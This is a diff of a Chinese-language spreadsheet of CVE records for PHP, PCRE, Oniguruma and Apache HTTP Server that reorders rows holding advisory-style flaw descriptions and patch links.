+          <t>5.6.26之前的PHP中ext/wddx/wddx.c中的wddx_stack_destroy函数中的free-after-free漏洞使远程攻击者可以通过wddxPacket拒绝服务或可能造成未指定的其他影响，这可能导致远程攻击者拒绝服务缺少记录集字段元素的结束标签的XML文档，从而导致wddx_deserialize调用中的处理不当。</t>
         </is>
       </c>
       <c r="G247" t="inlineStr">
@@ -30530,7 +30530,7 @@
       </c>
       <c r="J247" t="inlineStr">
         <is>
-          <t>CVE-2016-7129</t>
+          <t>CVE-2016-7413</t>
         </is>
       </c>
       <c r="K247" t="inlineStr">
@@ -30847,7 +30847,7 @@
     <row r="250">
       <c r="A250" t="inlineStr">
         <is>
-          <t>PHP 拒绝服务漏洞(CVE-2016-7417)</t>
+          <t>PHP拒绝服务漏洞(CVE-2016-7411)</t>
         </is>
       </c>
       <c r="B250" t="inlineStr">
@@ -30872,7 +30872,7 @@
       </c>
       <c r="F250" t="inlineStr">
         <is>
-          <t>PHP 5.6.26之前的ext/spl/spl_array.c和7.0.11之前的7.x继续进行SplArray反序列化，而无需验证返回值和数据类型，这使远程攻击者可以拒绝服务或可能造成未指定的其他影响通过精心制作的序列化数据。</t>
+          <t>PHP中的ext/standard/var_unserializer.re文件存在安全漏洞，该漏洞源于程序没有正确处理object-deserialization错误。远程攻击者可利用该漏洞造成拒绝服务（内存损坏）。</t>
         </is>
       </c>
       <c r="G250" t="inlineStr">
@@ -30892,7 +30892,7 @@
       </c>
       <c r="J250" t="inlineStr">
         <is>
-          <t>CVE-2016-7417</t>
+          <t>CVE-2016-7411</t>
         </is>
       </c>
       <c r="K250" t="inlineStr">
@@ -30967,7 +30967,7 @@
     <row r="251">
       <c r="A251" t="inlineStr">
         <is>
-          <t>PHP拒绝服务漏洞(CVE-2016-7411)</t>
+          <t>PHP 拒绝服务漏洞(CVE-2016-7417)</t>
         </is>
       </c>
       <c r="B251" t="inlineStr">
@@ -30992,7 +30992,7 @@
       </c>
       <c r="F251" t="inlineStr">
         <is>
-          <t>PHP中的ext/standard/var_unserializer.re文件存在安全漏洞，该漏洞源于程序没有正确处理object-deserialization错误。远程攻击者可利用该漏洞造成拒绝服务（内存损坏）。</t>
+          <t>PHP 5.6.26之前的ext/spl/spl_array.c和7.0.11之前的7.x继续进行SplArray反序列化，而无需验证返回值和数据类型，这使远程攻击者可以拒绝服务或可能造成未指定的其他影响通过精心制作的序列化数据。</t>
         </is>
       </c>
       <c r="G251" t="inlineStr">
@@ -31012,7 +31012,7 @@
       </c>
       <c r="J251" t="inlineStr">
         <is>
-          <t>CVE-2016-7411</t>
+          <t>CVE-2016-7417</t>
         </is>
       </c>
       <c r="K251" t="inlineStr">
@@ -36625,7 +36625,7 @@
     <row r="298">
       <c r="A298" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 输入验证错误漏洞（CVE-2022-22721）</t>
+          <t>Apache HTTP Server 请求走私漏洞(CVE-2022-36760)</t>
         </is>
       </c>
       <c r="B298" t="inlineStr">
@@ -36640,18 +36640,17 @@
       </c>
       <c r="D298" t="inlineStr">
         <is>
-          <t>Improper Input Validation</t>
+          <t>Protocol Bypass</t>
         </is>
       </c>
       <c r="E298" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F298" t="inlineStr">
         <is>
-          <t xml:space="preserve">Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4.52 及更早版本存在输入验证错误漏洞，该漏洞源于如果在 32 位系统上将 LimitXMLRequestBody 设置为允许大于 350MB（默认为 1M）的请求正文，则会发生整数溢出，随后会导致越界写入。
-</t>
+          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4版本至2.4.54之前版本存在环境问题漏洞，该漏洞源于从mod_proxy_ajp函数中发现包含HTTP请求走私漏洞。</t>
         </is>
       </c>
       <c r="G298" t="inlineStr">
@@ -36671,7 +36670,7 @@
       </c>
       <c r="J298" t="inlineStr">
         <is>
-          <t>CVE-2022-22721</t>
+          <t>CVE-2022-36760</t>
         </is>
       </c>
       <c r="K298" t="inlineStr">
@@ -36746,7 +36745,7 @@
     <row r="299">
       <c r="A299" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 请求走私漏洞(CVE-2022-36760)</t>
+          <t>Apache HTTP Server 输入验证错误漏洞（CVE-2022-22721）</t>
         </is>
       </c>
       <c r="B299" t="inlineStr">
@@ -36761,17 +36760,18 @@
       </c>
       <c r="D299" t="inlineStr">
         <is>
-          <t>Protocol Bypass</t>
+          <t>Improper Input Validation</t>
         </is>
       </c>
       <c r="E299" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F299" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4版本至2.4.54之前版本存在环境问题漏洞，该漏洞源于从mod_proxy_ajp函数中发现包含HTTP请求走私漏洞。</t>
+          <t xml:space="preserve">Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4.52 及更早版本存在输入验证错误漏洞，该漏洞源于如果在 32 位系统上将 LimitXMLRequestBody 设置为允许大于 350MB（默认为 1M）的请求正文，则会发生整数溢出，随后会导致越界写入。
+</t>
         </is>
       </c>
       <c r="G299" t="inlineStr">
@@ -36791,7 +36791,7 @@
       </c>
       <c r="J299" t="inlineStr">
         <is>
-          <t>CVE-2022-36760</t>
+          <t>CVE-2022-22721</t>
         </is>
       </c>
       <c r="K299" t="inlineStr">
@@ -38192,7 +38192,7 @@
     <row r="311">
       <c r="A311" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8390)</t>
+          <t>PHP 安全漏洞(CVE-2015-8391)</t>
         </is>
       </c>
       <c r="B311" t="inlineStr">
@@ -38218,7 +38218,7 @@
       </c>
       <c r="F311" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理字符类中的‘[：’和‘＼＼’子串。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（未初始化内存读取）。PHP 引用这个底层库。</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本的pcre_compile.c文件中的‘pcre_compile’函数存在安全漏洞，该漏洞源于程序没有正确处理特定的‘[：’嵌套。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（CPU消耗）。PHP引用了此底层组件。</t>
         </is>
       </c>
       <c r="G311" t="inlineStr"/>
@@ -38234,7 +38234,7 @@
       </c>
       <c r="J311" t="inlineStr">
         <is>
-          <t>CVE-2015-8390</t>
+          <t>CVE-2015-8391</t>
         </is>
       </c>
       <c r="K311" t="inlineStr">
@@ -38309,7 +38309,7 @@
     <row r="312">
       <c r="A312" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8391)</t>
+          <t>PHP 安全漏洞(CVE-2015-8390)</t>
         </is>
       </c>
       <c r="B312" t="inlineStr">
@@ -38335,7 +38335,7 @@
       </c>
       <c r="F312" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本的pcre_compile.c文件中的‘pcre_compile’函数存在安全漏洞，该漏洞源于程序没有正确处理特定的‘[：’嵌套。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（CPU消耗）。PHP引用了此底层组件。</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理字符类中的‘[：’和‘＼＼’子串。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（未初始化内存读取）。PHP 引用这个底层库。</t>
         </is>
       </c>
       <c r="G312" t="inlineStr"/>
@@ -38351,7 +38351,7 @@
       </c>
       <c r="J312" t="inlineStr">
         <is>
-          <t>CVE-2015-8391</t>
+          <t>CVE-2015-8390</t>
         </is>
       </c>
       <c r="K312" t="inlineStr">
@@ -38543,7 +38543,7 @@
     <row r="314">
       <c r="A314" t="inlineStr">
         <is>
-          <t>PHP 越界写入漏洞(CVE-2017-9226)</t>
+          <t>PHP 越界读取漏洞(CVE-2017-9224)</t>
         </is>
       </c>
       <c r="B314" t="inlineStr">
@@ -38558,17 +38558,17 @@
       </c>
       <c r="D314" t="inlineStr">
         <is>
-          <t>Out Of Bounds Array Access Vulnerability</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E314" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/kkos/oniguruma/commit/690313a061f7a4fa614ec5cc8368b4f2284e059b</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.sqlite.org/releaselog/3_8_9.html</t>
         </is>
       </c>
       <c r="F314" t="inlineStr">
         <is>
-          <t>在Oniguruma 6.2.0中发现了一个问题，在Ruby中通过2.4.1的Oniguruma-mod和在PHP中通过7.1.5的mbstring中使用。正则表达式编译期间，next_state_val（）中发生堆越界写入或读取。大于0xff的八进制数字在fetch_token（）和fetch_token_in_cc（）中无法正确处理。包含八进制数形式为'\ 700'的格式不正确的正则表达式将在next_state_val（）中产生大于0xff的无效代码点值，从而导致越界写入内存损坏。</t>
+          <t>在Oniguruma 6.2.0中发现了一个问题，在Ruby中通过2.4.1的Oniguruma-mod和在PHP中通过7.1.5的mbstring中使用。在正则表达式搜索期间，在match_at（）中发生堆栈越界读取。在match_at（）中涉及验证和访问顺序的逻辑错误可能会导致从堆栈缓冲区读取越界。</t>
         </is>
       </c>
       <c r="G314" t="inlineStr">
@@ -38588,7 +38588,7 @@
       </c>
       <c r="J314" t="inlineStr">
         <is>
-          <t>CVE-2017-9226</t>
+          <t>CVE-2017-9224</t>
         </is>
       </c>
       <c r="K314" t="inlineStr">
@@ -38663,7 +38663,7 @@
     <row r="315">
       <c r="A315" t="inlineStr">
         <is>
-          <t>PHP 越界读取漏洞(CVE-2017-9224)</t>
+          <t>PHP 越界写入漏洞(CVE-2017-9226)</t>
         </is>
       </c>
       <c r="B315" t="inlineStr">
@@ -38678,17 +38678,17 @@
       </c>
       <c r="D315" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Out Of Bounds Array Access Vulnerability</t>
         </is>
       </c>
       <c r="E315" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.sqlite.org/releaselog/3_8_9.html</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/kkos/oniguruma/commit/690313a061f7a4fa614ec5cc8368b4f2284e059b</t>
         </is>
       </c>
       <c r="F315" t="inlineStr">
         <is>
-          <t>在Oniguruma 6.2.0中发现了一个问题，在Ruby中通过2.4.1的Oniguruma-mod和在PHP中通过7.1.5的mbstring中使用。在正则表达式搜索期间，在match_at（）中发生堆栈越界读取。在match_at（）中涉及验证和访问顺序的逻辑错误可能会导致从堆栈缓冲区读取越界。</t>
+          <t>在Oniguruma 6.2.0中发现了一个问题，在Ruby中通过2.4.1的Oniguruma-mod和在PHP中通过7.1.5的mbstring中使用。正则表达式编译期间，next_state_val（）中发生堆越界写入或读取。大于0xff的八进制数字在fetch_token（）和fetch_token_in_cc（）中无法正确处理。包含八进制数形式为'\ 700'的格式不正确的正则表达式将在next_state_val（）中产生大于0xff的无效代码点值，从而导致越界写入内存损坏。</t>
         </is>
       </c>
       <c r="G315" t="inlineStr">
@@ -38708,7 +38708,7 @@
       </c>
       <c r="J315" t="inlineStr">
         <is>
-          <t>CVE-2017-9224</t>
+          <t>CVE-2017-9226</t>
         </is>
       </c>
       <c r="K315" t="inlineStr">
@@ -39623,7 +39623,7 @@
     <row r="323">
       <c r="A323" t="inlineStr">
         <is>
-          <t>PHP xml_parse_into_struct拒绝服务漏洞(CVE-2016-4539)</t>
+          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
         </is>
       </c>
       <c r="B323" t="inlineStr">
@@ -39638,17 +39638,17 @@
       </c>
       <c r="D323" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E323" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=d650063a0457aec56364e4005a636dc6c401f9cd</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
         </is>
       </c>
       <c r="F323" t="inlineStr">
         <is>
-          <t>PHP的ext/xml/xml.c中的ext_xml/xml.c中的xml_parse_into_struct函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（缓冲区读取不足和分段）错误）或可能通过第二个参数中的精心制作的XML数据产生未指定的其他影响，从而导致解析器级别为零。</t>
+          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
         </is>
       </c>
       <c r="G323" t="inlineStr">
@@ -39668,7 +39668,7 @@
       </c>
       <c r="J323" t="inlineStr">
         <is>
-          <t>CVE-2016-4539</t>
+          <t>CVE-2016-4538</t>
         </is>
       </c>
       <c r="K323" t="inlineStr">
@@ -39863,7 +39863,7 @@
     <row r="325">
       <c r="A325" t="inlineStr">
         <is>
-          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
+          <t>PHP xml_parse_into_struct拒绝服务漏洞(CVE-2016-4539)</t>
         </is>
       </c>
       <c r="B325" t="inlineStr">
@@ -39878,17 +39878,17 @@
       </c>
       <c r="D325" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E325" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=d650063a0457aec56364e4005a636dc6c401f9cd</t>
         </is>
       </c>
       <c r="F325" t="inlineStr">
         <is>
-          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
+          <t>PHP的ext/xml/xml.c中的ext_xml/xml.c中的xml_parse_into_struct函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（缓冲区读取不足和分段）错误）或可能通过第二个参数中的精心制作的XML数据产生未指定的其他影响，从而导致解析器级别为零。</t>
         </is>
       </c>
       <c r="G325" t="inlineStr">
@@ -39908,7 +39908,7 @@
       </c>
       <c r="J325" t="inlineStr">
         <is>
-          <t>CVE-2016-4538</t>
+          <t>CVE-2016-4539</t>
         </is>
       </c>
       <c r="K325" t="inlineStr">
@@ -39983,7 +39983,7 @@
     <row r="326">
       <c r="A326" t="inlineStr">
         <is>
-          <t>PHP grapheme_strpos拒绝服务漏洞(CVE-2016-4541)</t>
+          <t>PHP grapheme_stripos拒绝服务漏洞(CVE-2016-4540)</t>
         </is>
       </c>
       <c r="B326" t="inlineStr">
@@ -40003,12 +40003,12 @@
       </c>
       <c r="E326" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
         </is>
       </c>
       <c r="F326" t="inlineStr">
         <is>
-          <t>PHP中ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_strpos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
+          <t>PHP的ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_stripos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G326" t="inlineStr">
@@ -40028,7 +40028,7 @@
       </c>
       <c r="J326" t="inlineStr">
         <is>
-          <t>CVE-2016-4541</t>
+          <t>CVE-2016-4540</t>
         </is>
       </c>
       <c r="K326" t="inlineStr">
@@ -40103,7 +40103,7 @@
     <row r="327">
       <c r="A327" t="inlineStr">
         <is>
-          <t>PHP grapheme_stripos拒绝服务漏洞(CVE-2016-4540)</t>
+          <t>PHP grapheme_strpos拒绝服务漏洞(CVE-2016-4541)</t>
         </is>
       </c>
       <c r="B327" t="inlineStr">
@@ -40123,12 +40123,12 @@
       </c>
       <c r="E327" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
         </is>
       </c>
       <c r="F327" t="inlineStr">
         <is>
-          <t>PHP的ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_stripos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
+          <t>PHP中ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_strpos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G327" t="inlineStr">
@@ -40148,7 +40148,7 @@
       </c>
       <c r="J327" t="inlineStr">
         <is>
-          <t>CVE-2016-4540</t>
+          <t>CVE-2016-4541</t>
         </is>
       </c>
       <c r="K327" t="inlineStr">
@@ -40223,7 +40223,7 @@
     <row r="328">
       <c r="A328" t="inlineStr">
         <is>
-          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
+          <t>PHP exif_process_ifd_tag拒绝服务漏洞(CVE-2016-4542)</t>
         </is>
       </c>
       <c r="B328" t="inlineStr">
@@ -40243,12 +40243,12 @@
       </c>
       <c r="E328" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
         </is>
       </c>
       <c r="F328" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
+          <t>PHP的ext/exif/exif.c中的exif_process_IFD_TAG函数在5.5.35之前的版本，5.6.21之前的5.6.x和7.0.6之前的7.x不能正确构造spprintf参数，这使远程攻击者可以拒绝服务（越界读取）或可能通过精心制作的标头数据产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G328" t="inlineStr">
@@ -40268,7 +40268,7 @@
       </c>
       <c r="J328" t="inlineStr">
         <is>
-          <t>CVE-2016-4543</t>
+          <t>CVE-2016-4542</t>
         </is>
       </c>
       <c r="K328" t="inlineStr">
@@ -40343,7 +40343,7 @@
     <row r="329">
       <c r="A329" t="inlineStr">
         <is>
-          <t>PHP exif_process_ifd_tag拒绝服务漏洞(CVE-2016-4542)</t>
+          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
         </is>
       </c>
       <c r="B329" t="inlineStr">
@@ -40363,12 +40363,12 @@
       </c>
       <c r="E329" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
         </is>
       </c>
       <c r="F329" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c中的exif_process_IFD_TAG函数在5.5.35之前的版本，5.6.21之前的5.6.x和7.0.6之前的7.x不能正确构造spprintf参数，这使远程攻击者可以拒绝服务（越界读取）或可能通过精心制作的标头数据产生未指定的其他影响。</t>
+          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
         </is>
       </c>
       <c r="G329" t="inlineStr">
@@ -40388,7 +40388,7 @@
       </c>
       <c r="J329" t="inlineStr">
         <is>
-          <t>CVE-2016-4542</t>
+          <t>CVE-2016-4543</t>
         </is>
       </c>
       <c r="K329" t="inlineStr">
@@ -40704,7 +40704,7 @@
     <row r="332">
       <c r="A332" t="inlineStr">
         <is>
-          <t>PHP gdimagerotateinterpolated拒绝服务漏洞(CVE-2016-1903)</t>
+          <t>PHP php_var_unserialize()函数远程代码执行漏洞(CVE-2015-6835)</t>
         </is>
       </c>
       <c r="B332" t="inlineStr">
@@ -40719,17 +40719,17 @@
       </c>
       <c r="D332" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Code Execution</t>
         </is>
       </c>
       <c r="E332" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.php</t>
         </is>
       </c>
       <c r="F332" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/gd/libgd/gd_interpolation.c文件中的‘gdImageRotateInterpolated’函数存在安全漏洞，该漏洞源于‘imagerotate’函数没有充分过滤较大的‘bgd_color’参数。远程攻击者可利用该漏洞获取敏感信息，或造成拒绝服务（越边界读取和应用程序崩溃）。以下版本受到影响：PHP 5.5.31之前版本，5.6.17之前5.6.x版本，7.0.2之前7.x版本。</t>
+          <t>PHP 5.4.45之前的会话反序列化器，5.5.29之前的5.5.x和5.6.13之前的5.6.x中的会话反序列化器错误地处理了多个php_var_unserialize调用，这使远程攻击者可以执行任意代码或导致拒绝服务通过精心制作的会话内容。</t>
         </is>
       </c>
       <c r="G332" t="inlineStr">
@@ -40749,7 +40749,7 @@
       </c>
       <c r="J332" t="inlineStr">
         <is>
-          <t>CVE-2016-1903</t>
+          <t>CVE-2015-6835</t>
         </is>
       </c>
       <c r="K332" t="inlineStr">
@@ -40824,7 +40824,7 @@
     <row r="333">
       <c r="A333" t="inlineStr">
         <is>
-          <t>PHP php_var_unserialize()函数远程代码执行漏洞(CVE-2015-6835)</t>
+          <t>PHP gdimagerotateinterpolated拒绝服务漏洞(CVE-2016-1903)</t>
         </is>
       </c>
       <c r="B333" t="inlineStr">
@@ -40839,17 +40839,17 @@
       </c>
       <c r="D333" t="inlineStr">
         <is>
-          <t>Code Execution</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E333" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F333" t="inlineStr">
         <is>
-          <t>PHP 5.4.45之前的会话反序列化器，5.5.29之前的5.5.x和5.6.13之前的5.6.x中的会话反序列化器错误地处理了多个php_var_unserialize调用，这使远程攻击者可以执行任意代码或导致拒绝服务通过精心制作的会话内容。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/gd/libgd/gd_interpolation.c文件中的‘gdImageRotateInterpolated’函数存在安全漏洞，该漏洞源于‘imagerotate’函数没有充分过滤较大的‘bgd_color’参数。远程攻击者可利用该漏洞获取敏感信息，或造成拒绝服务（越边界读取和应用程序崩溃）。以下版本受到影响：PHP 5.5.31之前版本，5.6.17之前5.6.x版本，7.0.2之前7.x版本。</t>
         </is>
       </c>
       <c r="G333" t="inlineStr">
@@ -40869,7 +40869,7 @@
       </c>
       <c r="J333" t="inlineStr">
         <is>
-          <t>CVE-2015-6835</t>
+          <t>CVE-2016-1903</t>
         </is>
       </c>
       <c r="K333" t="inlineStr">
@@ -41425,7 +41425,7 @@
     <row r="338">
       <c r="A338" t="inlineStr">
         <is>
-          <t>PHP gd.c信息泄露漏洞(CVE-2016-7127)</t>
+          <t>PHP 整数溢出漏洞(CVE-2016-4073)</t>
         </is>
       </c>
       <c r="B338" t="inlineStr">
@@ -41440,18 +41440,18 @@
       </c>
       <c r="D338" t="inlineStr">
         <is>
-          <t>Information Disclosure</t>
+          <t>Integer Overflow</t>
         </is>
       </c>
       <c r="E338" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
-http://www.php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://git.php.net/?p=php-src.git;a=commit;h=64f42c73efc58e88671ad76b6b6bc8e2b62713e1</t>
         </is>
       </c>
       <c r="F338" t="inlineStr">
         <is>
-          <t>PHP 5.6.25之前的ext/gd/gd.c和7.0.10之前的7.x中的imagegammacorrect函数无法正确验证gamma值，这使远程攻击者可以拒绝服务（越界写入）或通过为第二个和第三个论点提供不同的符号来产生未指定的其他影响。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/mbstring/libmbfl/mbfl/mbfilter.c文件中的‘the mbfl_strcut’函数存在整数溢出漏洞。远程攻击者可借助特制的mb_strcut调用利用该漏洞造成拒绝服务（应用程序崩溃）或执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
         </is>
       </c>
       <c r="G338" t="inlineStr">
@@ -41471,7 +41471,7 @@
       </c>
       <c r="J338" t="inlineStr">
         <is>
-          <t>CVE-2016-7127</t>
+          <t>CVE-2016-4073</t>
         </is>
       </c>
       <c r="K338" t="inlineStr">
@@ -41546,7 +41546,7 @@
     <row r="339">
       <c r="A339" t="inlineStr">
         <is>
-          <t>PHP 整数溢出漏洞(CVE-2016-4073)</t>
+          <t>PHP gd.c信息泄露漏洞(CVE-2016-7127)</t>
         </is>
       </c>
       <c r="B339" t="inlineStr">
@@ -41561,18 +41561,18 @@
       </c>
       <c r="D339" t="inlineStr">
         <is>
-          <t>Integer Overflow</t>
+          <t>Information Disclosure</t>
         </is>
       </c>
       <c r="E339" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://git.php.net/?p=php-src.git;a=commit;h=64f42c73efc58e88671ad76b6b6bc8e2b62713e1</t>
+          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
+http://www.php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F339" t="inlineStr">
         <is>
